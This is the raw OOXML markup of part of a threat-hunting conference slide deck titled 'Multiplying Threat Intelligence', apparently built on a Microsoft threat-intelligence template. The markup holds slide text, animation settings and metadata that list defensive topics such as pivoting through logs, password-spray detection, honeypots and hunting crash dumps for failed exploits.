            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Layers of the attacker prism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Pivoting is navigating the graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B12DE22E-F04D-8B8C-AB70-5FEFDA3F1A64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strategies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94FF3978-EE96-B33A-2F09-F12C37673A88}"/>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Zoom Out to widen the field of vision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time Travel Breach Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hunting until Closure of the Pivoting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E36520CE-1B29-461E-9EAA-596307BF67E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412472" y="2190751"/>
            <a:ext cx="3427047" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tactics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{045ADE03-9A33-AC0B-21EB-EE365E6B854E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412476" y="2940316"/>
            <a:ext cx="3847257" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Looking for failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inducing failure </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Move attackers to more favorable terrain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bones of the Skeleton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Hunt their professionalism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1495521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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14">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fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">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xEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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xEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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xEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36"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uiExpand="1" build="p"/>
      <p:bldP spid="14" grpId="0" build="p"/>
      <p:bldP spid="15" grpId="0" uiExpand="1" build="p"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="MSTIC Template_Light_May2023">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8-50009_MSTIC_PPT_Template_Light</Template>
  <TotalTime>0</TotalTime>
  <Words>4035</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>635</Paragraphs>
  <Slides>37</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Arial</vt:lpstr>
      <vt:lpstr>Baskerville Old Face</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cascadia Mono</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>Segoe UI Semibold</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>MSTIC Template_Light_May2023</vt:lpstr>
      <vt:lpstr>Multiplying Threat Intelligence</vt:lpstr>
      <vt:lpstr>First Hearing about nullcon…in 2009</vt:lpstr>
      <vt:lpstr>How I got here</vt:lpstr>
      <vt:lpstr>Incidents as Truth</vt:lpstr>
      <vt:lpstr>Myth that offense has a richer arsenal than Defense</vt:lpstr>
      <vt:lpstr>Many Defensive Strategies</vt:lpstr>
      <vt:lpstr>Strategies to Multiply Threat Intelligence</vt:lpstr>
      <vt:lpstr>Threat Hunting</vt:lpstr>
      <vt:lpstr>Approach to Multiplying Threat Intelligence</vt:lpstr>
      <vt:lpstr>Foundational Concepts</vt:lpstr>
      <vt:lpstr>Every contact leaves a trace</vt:lpstr>
      <vt:lpstr>Every contact leaves a trace…in a log</vt:lpstr>
      <vt:lpstr>Attacker actions can exist at many logical layers</vt:lpstr>
      <vt:lpstr>Pivoting is navigating the Graph of your data</vt:lpstr>
      <vt:lpstr>Strategies</vt:lpstr>
      <vt:lpstr>Zoom Out…and hunt adversaries on their turf</vt:lpstr>
      <vt:lpstr>Hunting with Techniques one by one</vt:lpstr>
      <vt:lpstr>Hunting until Closure Example</vt:lpstr>
      <vt:lpstr>Hunt to find successful attacks…</vt:lpstr>
      <vt:lpstr>Pivot to Device Session Activity</vt:lpstr>
      <vt:lpstr>Iterate until the Closure of the Pivoting</vt:lpstr>
      <vt:lpstr>Time Travel Breach Detection</vt:lpstr>
      <vt:lpstr>Tactics</vt:lpstr>
      <vt:lpstr>Start with (Password Spray) Failure then look for Success</vt:lpstr>
      <vt:lpstr>Inducing (Psychological) Failure… in Honeypots</vt:lpstr>
      <vt:lpstr>Move attackers to more favorable terrain</vt:lpstr>
      <vt:lpstr>Hunt Crash dumps to find Failed Exploits </vt:lpstr>
      <vt:lpstr>Why might it fail?</vt:lpstr>
      <vt:lpstr>Bones of the Skeleton: Exploit Elements</vt:lpstr>
      <vt:lpstr>Exploit Elements: Control Hijack</vt:lpstr>
      <vt:lpstr>Exploit Elements: NOP Sleds</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Bones of the Skeleton</vt:lpstr>
      <vt:lpstr>Hunt their Professionalism</vt:lpstr>
      <vt:lpstr>In summary…</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2023-09-29T22:44:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-29T22:45:49Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>